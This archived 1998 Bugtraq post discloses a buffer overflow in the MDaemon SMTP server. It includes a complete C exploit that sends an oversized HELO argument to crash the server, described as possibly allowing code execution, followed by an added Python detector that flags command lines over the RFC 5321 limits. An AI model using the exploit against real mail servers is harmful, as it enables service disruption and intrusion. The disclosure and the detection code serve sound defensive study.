MDaemon SMTP Server Buffer Overflows
Aleph One (aleph1 at DFW.NET)
Wed, 11 Mar 1998 00:44:45 -0600
- Next message: Alan Cox: "Re: the purpose of dynamic memory allocation"
- Previous message: Alvaro Martinez Echevarria: "DoS (and possibly more) on MDaemon for NT/95"
- Next in thread: Suman_Saraf: "Security problem in Slackware."
[ forwarded from rootshell ]

Since a similar bug was just released about the MDaemon Config Manager on Bugtraq, we decided to release our MDaemon exploit early. After the exploit you will find the original Bugtraq post. Note that MDaemon has known about this bug since February. Look for our upcoming paper on SMTP server security.

```c
/*
 * MDaemon SMTP server for Windows buffer overflow exploit
 *
 * http://www.mdaemon.com - if you dare...
 *
 * Tested on MDaemon 2.71 SP1
 *
 * http://www.rootshell.com/
 *
 * Released 3/10/98
 *
 * (C) 1998 Rootshell All Rights Reserved
 *
 * For educational use only. Distribute freely.
 *
 * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
 * connector if SP2 has NOT been installed.
 *
 * Danger!
 *
 * A malicious user could use this bug to execute arbitrary code on the
 * remote system.
 *
 */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>   /* bzero, bcopy */
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *hp;
    char *buffer;
    int sock, i;

    if (argc != 2) {
        printf("usage: %s <smtp server>\n", argv[0]);
        exit(1);
    }
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("Unknown host: %s\n", argv[1]);
        exit(1);
    }
    bzero((char *) &sin, sizeof(sin));
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = htons(25);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0 || connect(sock, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
        perror("connect");
        exit(1);
    }
    /* Build "HELO " followed by 4096 'x' bytes and CRLF: the oversized
       HELO argument that triggers the overflow in the server. */
    buffer = (char *) malloc(10000);
    sprintf(buffer, "HELO ");
    for (i = 0; i < 4096; i++)
        strcat(buffer, "x");
    strcat(buffer, "\r\n");
    write(sock, &buffer[0], strlen(buffer));
    close(sock);
    free(buffer);
    return 0;
}
```

-- cut here --

Rootshell Note: The config manager appears to run on port 8081 and is configurable. In the version that we tested (2.71 SP1) this buffer overflow did not exist in the remote config manager, and required a remote version of 3.7 and not 3.0.
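The exploit above works by sending a HELO argument of 4096 bytes, far beyond what any legitimate client would send. The following is an added detection example, not part of the Bugtraq post or Rootshell's code: it applies the RFC 5321 size limits (255 octets for a domain name, 512 octets for a command line including CRLF) to client command lines, so a mail gateway or IDS tap in front of a server like the one described can flag the oversized HELO before it reaches the vulnerable parser. The sample session is constructed; the limit constants are the RFC's.

```python
"""Flag SMTP client command lines whose size breaks RFC 5321 limits.

Added defensive example (not from the original post). A mail relay or a
network sensor watching port 25 can run this over each client command line
to flag the oversized HELO/EHLO argument used by the MDaemon overflow.
"""

MAX_DOMAIN_LEN = 255     # RFC 5321 section 4.5.3.1.2: maximum domain length
MAX_COMMAND_LINE = 512   # RFC 5321 section 4.5.3.1.4: command line incl. CRLF


def check_smtp_line(line: bytes) -> dict:
    """Return a verdict for one client command line as received on the wire.

    The verdict carries the command verb, the argument length and a list of
    human-readable findings (empty when the line is within limits).
    """
    findings = []
    if len(line) > MAX_COMMAND_LINE:
        findings.append(f"command line {len(line)} > {MAX_COMMAND_LINE} octets")

    body = line.rstrip(b"\r\n")
    parts = body.split(b" ", 1)
    verb = parts[0].upper()
    arg = parts[1] if len(parts) > 1 else b""

    # HELO/EHLO carry a domain (or address literal); bound it by the domain limit.
    if verb in (b"HELO", b"EHLO"):
        if len(arg) > MAX_DOMAIN_LEN:
            findings.append(
                f"{verb.decode()} argument {len(arg)} > {MAX_DOMAIN_LEN} octets"
            )
        if not arg:
            findings.append(f"{verb.decode()} without argument")

    return {
        "verb": verb.decode(errors="replace"),
        "arg_len": len(arg),
        "findings": findings,
    }


def scan_session(lines):
    """Return (index, verdict) for every line in a session that raised a finding."""
    hits = []
    for i, line in enumerate(lines):
        verdict = check_smtp_line(line)
        if verdict["findings"]:
            hits.append((i, verdict))
    return hits


# Constructed sample session: a normal greeting, then a HELO shaped like the
# one the exploit sends (4096 'x' bytes), then a normal QUIT.
SAMPLE_SESSION = [
    b"HELO mail.example.org\r\n",
    b"MAIL FROM:<alice@example.org>\r\n",
    b"HELO " + b"x" * 4096 + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for idx, verdict in scan_session(SAMPLE_SESSION):
        print(f"line {idx}: {verdict['verb']} arg_len={verdict['arg_len']}: "
              + "; ".join(verdict["findings"]))
```

Only the third line trips the checks, on both counts (command line over 512 octets and HELO argument over 255 octets). The thresholds are deliberately the protocol's own limits rather than a guess at the server's buffer size: a client exceeding them is either broken or probing, and a relay that rejects such lines with a 5xx never hands them to the back-end parser.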